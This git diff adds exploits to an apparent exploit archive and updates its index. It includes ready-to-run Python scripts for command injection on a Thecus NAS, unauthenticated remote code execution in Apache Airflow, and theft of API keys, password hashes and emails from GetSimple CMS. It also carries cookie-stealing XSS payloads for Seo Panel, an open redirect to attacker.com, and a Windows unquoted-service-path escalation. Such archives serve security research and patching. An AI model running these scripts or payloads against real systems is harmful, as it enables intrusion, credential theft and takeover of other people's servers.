diff --git a/exploits/hardware/webapps/49926.py b/exploits/hardware/webapps/49926.py new file mode 100755 index 000000000..244b06c3e --- /dev/null +++ b/exploits/hardware/webapps/49926.py @@ -0,0 +1,98 @@ +# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection +# Date: 01/06/2021 +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: http://www.thecus.com/ +# Software Link: http://www.thecus.com/product.php?PROD_ID=83 +# Version: N4800Eco +# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection + + +#!/usr/bin/python3 +import requests +import sys +import urllib3 + + +# To fix SSL error that occurs when the script is started. +# 1- Open /etc/ssl/openssl.cnf file +# At the bottom of the file: +# [system_default_sect] +# MinProtocol = TLSv1.2 +# CipherString = DEFAULT@SECLEVEL=2 +# 2- Set value of MinProtocol as TLSv1.0 + + +def readResult(s, target): + d = { + "fun": "setlog", + "action": "query", + "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]' + } + url = "http://" + target + "/adm/setmain.php" + resultReq = s.post(url, data=d, verify=False) + dict = resultReq.text.split() + print("[+] Reading system log...\n") + print(dict[5:8]) #change this range to read whole output of the command + +def delUser(s, target, command): + d = { + "action": "delete", + "username": "$("+command+")" + } + url = "http://" + target + "/adm/setmain.php?fun=setlocaluser" + delUserReq = s.post(url, data=d, allow_redirects=False, verify=False) + + if 'Local User remove succeeds' in delUserReq.text: + print('[+] %s command was executed successfully' % command) + else: + print('[-] %s command was not executed!' %command) + sys.exit(1) + readResult(s, target) + +def addUser(s, target, command): + d = {'batch_content': '%24('+command+')%2C22222%2C9999'} + url = "http://" + target + "/adm/setmain.php?fun=setbatch" + addUserReq = s.post(url, data=d, allow_redirects=False, verify=False) + + if 'Users and groups were created successfully.' in addUserReq.text: + print('[+] Users and groups were created successfully') + else: + print('[-] Users and groups were not created') + sys.exit(1) + delUser(s, target, command) + +def login(target, username, password, command=None): + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + s = requests.Session() + d = { + "&eplang": "english", + "p_pass": password, + "p_user": username, + "username": username, + "pwd": password, + "action": "login", + "option": "com_extplorer" + } + url = "http://" + target + "/adm/login.php" + loginReq = s.post(url, data=d, allow_redirects=False, verify=False) + + if '"success":true' in loginReq.text: + print('[+] Authentication successful') + elif '"success":false' in loginReq.text: + print('[-] Authentication failed!') + sys.exit(1) + else: + print('[-] Something went wrong!') + sys.exit(1) + addUser(s, target, command) + +def main(args): + if len(args) != 5: + print("usage: %s targetIp:port username password command" % (args[0])) + print("Example 192.168.1.13:80 admin admin id") + sys.exit(1) + login(target=args[1], username=args[2], password=args[3], command=args[4]) + + +if __name__ == "__main__": + main(args=sys.argv) \ No newline at end of file diff --git a/exploits/multiple/webapps/49927.py b/exploits/multiple/webapps/49927.py new file mode 100755 index 000000000..b9b0e300f --- /dev/null +++ b/exploits/multiple/webapps/49927.py @@ -0,0 +1,116 @@ +# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution +# Date: 2021-06-02 +# Exploit Author: Pepe Berba +# Vendor Homepage: https://airflow.apache.org/ +# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html +# Version: <= 1.10.10 +# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml) +# CVE : CVE-2020-11978 +# +# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow +# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default. +# Together, potentially allows unauthenticated RCE to Airflow +# +# Repo: https://github.com/pberba/CVE-2020-11978 +# More information can be found here: +# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E +# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E +# +# Remediation: +# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set. +# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG. +# +# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test" + +import argparse +import requests +import sys +import time + +def create_dag(url, cmd): + print('[+] Checking if Airflow Experimental REST API is accessible...') + check = requests.get('{}/api/experimental/test'.format(url)) + + if check.status_code == 200: + print('[+] /api/experimental/test returned 200' ) + else: + print('[!] /api/experimental/test returned {}'.format(check.status_code)) + print('[!] Airflow Experimental REST API not be accessible') + sys.exit(1) + + check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url)) + if check_task.status_code != 200: + print('[!] Failed to find the example_trigger_target_dag.bash_task') + print('[!] Host isn\'t vunerable to CVE-2020-11978') + sys.exit(1) + elif 'dag_run' in check_task.json()['env']: + print('[!] example_trigger_target_dag.bash_task is patched') + print('[!] Host isn\'t vunerable to CVE-2020-11978') + sys.exit(1) + print('[+] example_trigger_target_dag.bash_task is vulnerable') + + unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url)) + if unpause.status_code != 200: + print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded') + sys.exit(1) + else: + print('[+] example_trigger_target_dag was enabled') + + print('[+] Creating new DAG...') + res = requests.post( + '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url), + json={ + 'conf': { + 'message': '"; {} #'.format(cmd) + } + } + ) + + if res.status_code == 200: + print('[+] Successfully created DAG') + print('[+] "{}"'.format(res.json()['message'])) + else: + print('[!] Failed to create DAG') + sys.exit(1) + + wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format( + url = url, + execution_date=res.json()['execution_date'] + ) + + start_time = time.time() + print('[.] Waiting for the scheduler to run the DAG... This might take a minute.') + print('[.] If the bash task is never queued, then the scheduler might not be running.') + while True: + time.sleep(10) + res = requests.get(wait_url) + status = res.json()['state'] + if status == 'queued': + print('[.] Bash task queued...') + elif status == 'running': + print('[+] Bash task running...') + elif status == 'success': + print('[+] Bash task successfully ran') + break + elif status == 'None': + print('[-] Bash task is not yet queued...'.format(status)) + else: + print('[!] Bash task was {}'.format(status)) + sys.exit(1) + + return 0 + + +def main(): + arg_parser = argparse.ArgumentParser() + arg_parser.add_argument('url', type=str, help="Base URL for Airflow") + arg_parser.add_argument('command', type=str) + args = arg_parser.parse_args() + + create_dag( + args.url, + args.command + ) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/49928.py b/exploits/php/webapps/49928.py new file mode 100755 index 000000000..81c99a925 --- /dev/null +++ b/exploits/php/webapps/49928.py @@ -0,0 +1,90 @@ +# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure +# Date 01.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: http://get-simple.info/ +# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip +# Version: 3.3.4 +# CVE: CVE-2014-8722 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit + + +''' +Description: +GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to +(1) data/users/.xml, +(2) backups/users/.xml.bak, +(3) data/other/authorization.xml, or +(4) data/other/appid.xml. +''' + + +''' +Import required modules: +''' +import sys +import requests + +''' +User-Input: +''' +target_ip = sys.argv[1] +target_port = sys.argv[2] +cmspath = sys.argv[3] +print('') +username = input("Do you know the username? Y/N: ") +if username == 'Y': + print('') + username = True + username_string = input('Please enter the username: ') +else: + print('') + username = False + print('No problem, you will still get the API key') + + +''' +Get Api-Key: +''' +url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml' +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Connection": "close", + "Upgrade-Insecure-Requests": "1", + "Cache-Control": "max-age=0" +} +x = requests.get(url, headers=header).text +start = x.find('[') + 7 +end = x.find(']') +api_key = x[start:end] +print('') +print('Informations:') +print('') +print('[*] API Key: ' + api_key) + + +if username: + ''' + Get Email and Passwordhash: + ''' + url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml' + header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Connection": "close", + "Upgrade-Insecure-Requests": "1", + "Cache-Control": "max-age=0" + } + x = requests.get(url, headers=header).text + start = x[x.find('PWD>'):] + passwordhash = start[start.find('>') +1 :start.find('<')] + print('[*] Hashed Password: ' + passwordhash) + + start = x[x.find('EMAIL>'):] + email = start[start.find('>') + 1 : start.find('<')] + print('[*] Email: ' + email) +print('') \ No newline at end of file diff --git a/exploits/php/webapps/49931.txt b/exploits/php/webapps/49931.txt new file mode 100644 index 000000000..9fa03c832 --- /dev/null +++ b/exploits/php/webapps/49931.txt @@ -0,0 +1,21 @@ +# Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS +# Date: 21-03-2021 +# Exploit Author: Piyush Patil +# Vendor Homepage: https://www.seopanel.org/ +# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 +# Version: Seo Panel 4.8.0 +# Tested on: Windows 10 and Kali +# CVE : CVE-2021-28417 + + +-Description: + A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. + +-Payload used: +x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 + +-Steps to reproduce: +1- Login to SEO admin panel +2- Add below line at the end: +http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com +3- Hover your mouse near to "CTR" field \ No newline at end of file diff --git a/exploits/php/webapps/49932.txt b/exploits/php/webapps/49932.txt new file mode 100644 index 000000000..cb4bb5713 --- /dev/null +++ b/exploits/php/webapps/49932.txt @@ -0,0 +1,21 @@ +# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS +# Date: 22-03-2021 +# Exploit Author: Piyush Patil +# Vendor Homepage: https://www.seopanel.org/ +# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 +# Version: Seo Panel 4.8.0 +# Tested on: Windows 10 and Kali +# CVE : CVE-2021-28418 + + +-Description: +A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. + +-Payload used: +x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 + +-Steps to reproduce: +1- Login to SEO admin panel +2- Visit: +http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 +3- Hover your mouse to "Cancel" field \ No newline at end of file diff --git a/exploits/python/webapps/49930.txt b/exploits/python/webapps/49930.txt new file mode 100644 index 000000000..56bd197b7 --- /dev/null +++ b/exploits/python/webapps/49930.txt @@ -0,0 +1,17 @@ +# Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect +# Exploit Author: Piyush Patil +# Affected Component: Pluggable Zope authentication/authorization framework +# Component Link: https://pypi.org/project/Products.PluggableAuthService/ +# Version: < 2.6.1 +# CVE: CVE-2021-21337 +# Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr + + +--------------------------Proof of Concept----------------------- + +1- Goto https://localhost/login +2- Turn on intercept and click on the login +3- Change "came_from" parameter value to https://attacker.com +4- User will be redirected to an attacker-controlled website. + +Fix: pip install "Products.PluggableAuthService>=2.6.1" \ No newline at end of file diff --git a/exploits/windows/local/49929.txt b/exploits/windows/local/49929.txt new file mode 100644 index 000000000..6adee93a9 --- /dev/null +++ b/exploits/windows/local/49929.txt @@ -0,0 +1,38 @@ +# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path +# Date: 06-01-2021 +# Exploit Author: Geovanni Ruiz +# Vendor Homepage: https://www.intel.com +# Software Version: 01.00.1080.0 +# File Version: 1.00.1080.0 +# Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es +# Vulnerability Type: Unquoted Service Path + + +# 1. To find the unquoted service path vulnerability + +C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname + +DisplayName Name PathName StartMode StartName +Intel(R) Audio Service IntelAudioService C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe Auto LocalSystem + + +# 2. To check service info: + +C:\>sc qc "IntelAudioService" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: IntelAudioService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Intel(R) Audio Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +# 3. Exploit: + +To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order +to gain SYSTEM privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cc2566b0d..f3bb35fe5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11341,6 +11341,7 @@ id,file,description,date,author,type,platform,port 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",2021-05-24,"Erick Galindo",local,windows, 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows, 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows, +49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44088,3 +44089,9 @@ id,file,description,date,author,type,platform,port 49922,exploits/cgi/webapps/49922.txt,"CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)",2021-06-01,sirpedrotavares,webapps,cgi, 49923,exploits/cgi/webapps/49923.txt,"CHIYU TCP/IP Converter devices - CRLF injection",2021-06-01,sirpedrotavares,webapps,cgi, 49924,exploits/multiple/webapps/49924.py,"Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)",2021-06-01,"Mohammed Aloraimi",webapps,multiple, +49926,exploits/hardware/webapps/49926.py,"Thecus N4800Eco Nas Server Control Panel - Comand Injection",2021-06-02,"Metin Yunus Kandemir",webapps,hardware, +49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple, +49928,exploits/php/webapps/49928.py,"GetSimple CMS 3.3.4 - Information Disclosure",2021-06-02,"Ron Jost",webapps,php, +49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python, +49931,exploits/php/webapps/49931.txt,"Seo Panel 4.8.0 - 'search_name' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php, +49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,